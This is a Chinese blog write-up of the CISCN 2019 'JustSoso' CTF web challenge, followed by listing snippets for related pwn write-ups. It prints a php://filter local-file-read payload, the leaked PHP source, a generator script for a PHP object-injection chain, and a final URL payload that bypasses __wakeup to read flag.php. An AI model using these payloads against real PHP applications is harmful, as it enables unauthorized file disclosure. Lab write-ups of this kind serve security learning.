ciscn2019部分writeup

最新推荐文章于 2024-08-25 21:38:13 发布
原创 最新推荐文章于 2024-08-25 21:38:13 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ciscn2019 #赛题复现

本文详细解析PHP序列化与反序列化过程中的安全漏洞,通过具体实例演示如何利用这一漏洞获取flag,包括代码审计、绕过防御机制及最终的漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Web

1、JustSoso
拿到源码

打开靶机,查看源码得到提示:
在这里插入图片描述
一看就是文件读取,然后就文件读取走一波。
file=php://filter/read=convert.base64-encode/resource=hint.php
base64解码拿到hint.php的源码:

<?php
    class Handle{
        private $handle;
        public function __wakeup(){
            foreach(get_object_vars($this) as $k => $v) {
                $this->$k = null;
            }
            echo "Waking up\n";
        }
        public function __construct($handle) {
            $this->handle = $handle;
        }
        public function __destruct(){
            $this->handle->getFlag();
        }
    }

    class Flag{
        public $file;
        public $token;
        public $token_flag;

        function __construct($file){
            $this->file = $file;
            $this->token_flag = $this->token = md5(rand(1,10000));
        }

        public function getFlag(){
            $this->token_flag = md5(rand(1,10000));
            if($this->token === $this->token_flag)
            {
                if(isset($this->file)){
                    echo @highlight_file($this->file,true);
                }
            }
        }
    }
    ?>

我们已知的页面还有index.php,再读出index.php的源码:

<html>
    <?php
    error_reporting(0);
    $file = $_GET["file"];
    $payload = $_GET["payload"];
    if(!isset($file)){
        echo 'Missing parameter'.'<br>';
    }
    if(preg_match("/flag/",$file)){
        die('hack attacked!!!');
    }
    @include($file);
    if(isset($payload)){
        $url = parse_url($_SERVER['REQUEST_URI']);
        parse_str($url['query'],$query);
        foreach($query as $value){
            if (preg_match("/flag/",$value)) {
                die('stop hacking!');
                exit();
            }
        }
        $payload = unserialize($payload);
    }else{
       echo "Missing parameters";
    }
    ?>
    <!--Please test index.php?file=xxx.php -->
    <!--Please get the source of hint.php-->
    </html>

大致看下,拿flag应该是在hint.php的Flag类中getFlag()的echo @highlight_file($this->file,true)这里,然后审计代码找解决问题的方法。

代码审计

index中最后会进行反序列化,我们要利用序列化的漏洞。
include($file),因为类都在hint.php中,file参数中也被过滤flag字符串,所以这个$file就是hint.php了;然后考虑payload,拿flag的时候要调用getFlag函数用@highlight_file来显示源码,那么flag就可能是在flag.php中了,那么就要考虑绕过parse_url和正则匹配,然后才能进行反序列化。
parse_url和正则匹配的绕过参考:
进行反序列化后,由于在Handle中可以调用getFlag函数,由于__wakeup()会把参数内容置空,所以要绕过Handle中的__wakeup(),修改类的属性即可(参考:https://blog.youkuaiyun.com/zz_Caleb/article/details/89361250),绕过__wakeup()之后在类的声明周期结束时调用析构函数,从而调用getFlag()函数。
在getFlag()函数中唯一的障碍就是$this->token === $this->token_flag,这里可以用一个引用把两者关联起来。

漏洞利用

使用一下代码生成payload:

<?php
class Handle{
    private $handle;
    public function __wakeup(){
        foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
    public function __construct($handle) {
        $this->handle = $handle;
    }
    public function __destruct(){
        $this->handle->getFlag();
    }
}

class Flag{
    public $file;
    public $token;
    public $token_flag;

    function __construct($file){
        $this->file = $file;
        $this->token_flag = $this->token = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
        {
            if(isset($this->file)){
                echo @highlight_file($this->file,true);
            }
        }
    }
}

$f = new Flag("flag.php");
$f->token = &$f->token_flag;
$hand = new Handle($f);
print_r(serialize($hand));
?>

生成:
O:6:“Handle”:1:{s:14:“Handlehandle”;O:4:“Flag”:3:{s:4:“file”;s:8:“flag.php”;s:5:“token”;s:32:“3dde11a7673e90ad96fafd0b3b27a477”;s:10:“token_flag”;R:4;}}

最终构造
///?file=hint.php&payload=O:6:“Handle”:2:{s:14:“Handlehandle”;O:4:“Flag”:3:{s:4:“file”;s:8:“flag.php”;s:5:“token”;s:32:“3dde11a7673e90ad96fafd0b3b27a477”;s:10:“token_flag”;R:4;}}
(记得要修改Handle类的属性的)
访问即得flag。

ciscn_2019_en_2
m0sway的博客
03-25 1735
ciscn_2019_en_2 WriteUp BUU_PWN
BSidesSF 2019 部分writeup
Kr的博客
03-06 2550
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
ciscn_2019_c_1 Writeup
Calllin的博客
05-06 682
ciscn_2019_c_1 Writeup 前提 本程序防御策略 >checksec ./cisscn_2019_c_1 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 本程序逻辑是输入一个字符串,按照内置加密函数逻辑加密转化为密文。但在加密函数中存在溢出漏洞。 存在strlen()函数。使用
BUUCTF ciscn_2019_c_1
、moddemod
06-01 1326
跑一下程序,大致流程是 到现在程序就基本分析完成,接下来需要构造rop泄露libc地址然后利用system等函数获得shell 我们首先要获得libc的基地址,可以通过puts函数入手,这里解释一下为什么通过puts函数而不通过其他函数,因为puts函数在我们进入encrypt函数之前已经调用了很多次了,对于每一个动态链接而言,第一次调用完成以后,就修正了.got表中的对应的puts函数的地址,所以我们可以通过puts函数泄露。 from pwn import * from LibcSearc.
ciscn_2019_c_1
weixin_56301399的博客
07-21 2111
ret2libc来泄露libc基址
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
本文档“Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx”将深入解析Codefest'19中的几个关键挑战,并对它们的解决方案进行阐述。 在CTF中,第一个挑战“欢迎来到 Codefest 19!”的设置往往旨在测试参者...
第二届安洵杯2019部分writeup
Sea_Sand息禅
12-01 6273
Misc 吹着⻉斯扫⼆维码 这个就有点过分了,36张碎片,手动拼二维码 先是爆破出了压缩包的密码,解出来flag.txt里面有点乱码,显然还需要操作,可能就跟二维码有关了,二维码扫出来的结果是: BASE Family Bucket ??? 85->64->85->13->16->32 下面就需要把flag.txt中的内容进行base的这一系列的解码了,但是这个1...
RoarCTF2019部分Writeup
Sea_Sand息禅
11-29 1005
Easy Calc 页面源码线索中得到calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"'...
ISCC 2019 部分 Writeup
热门推荐
zhy_27的博客
05-25 1万+
ISCC 2019 WriteupMisc1. 隐藏的信息(50)2. Welcome(100)3. 倒立屋(100)4. 无法运行的exe(150)5. 他们能在一起吗?(200)6. Keyes' secret(200)7. Aesop's secret(300)8. 碎纸机(400)Reverse1. answer to everything(100)2. dig dig dig(200)3...
writeup
m0_52632244的博客
01-24 324
crypto [TorchWoodCTF2021]当铺的秘密 打开压缩包里的word文档得到一串汉字,这里考察的是当铺密码,根据露头的笔画数转换成对应的数字,比如 王壮 ,王是6,壮是9,转换成ascii码就是69 这里写了一串代码,可以参考一下,因为土和士都是3,这里就把士改为土 t='王壮 夫工 王中 王夫 由由井 井人 夫中 夫夫 井王 土土 夫由 土夫 井中 土夫 王工 王人 土由 由口夫' s ='口由中人工土王夫井壮' code=t code = code.split(" ") w = ''
Writeup
Ater的博客
11-19 689
十一月份上旬总结 在做这道目之前下载了虚拟机安装好了Ubuntu 然后弄好共享文件夹(经过百度我在Ubuntu中找到了我创建的share共享文件夹) 然后将此的附件下载到share文件夹,并且改好名字,因为名字太长不方便使用,我改成了linux 分析目,需要在linux里面找到关于flag的东西 打开终端,输入以下代码进入root身份(经过百度已经创建好了root身份) su root ...
WriteUp
he_stand的博客
03-16 528
WriteUp 1.目名称 backup 2.难度系数 简单 3.目来源 Cyberpeace-n3k0 4.目描述 X老师忘记删除备份文件,他派小宁同学去把备份文件找出来,一起来帮小宁同学吧! http://111.198.29.45:30117/ 5.解步骤 5.1打开网址 5.2 页面提示index.php的备份文件名 php的备份文件名的后缀为bak尝试访问备份文件index....
[BUUCTF] ciscn_2019_en_2
最新发布
a3314019530的博客
08-25 309
程序里面既没有现成的system也没有/bin/sh字符串。所以思路应该是通过put函数泄露libc地址,然后拿到system函数和/bin/sh字符串实现攻击。用ida查看一下,只有输入1进入encrypt()函数内,然后利用gets函数可以实现栈溢出攻击。64位程序,开了NX保护。先checksec一下。
Datacon2019攻击分析WriteUp解析
压缩包中的文件名称为Datacon2019-WriteUp-master,这可能表示该压缩包内含的是一份针对Datacon2019项目的详细分析报告(WriteUp),它将包括对比目、解决方案、使用的工具和方法论的全面描述。写手...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值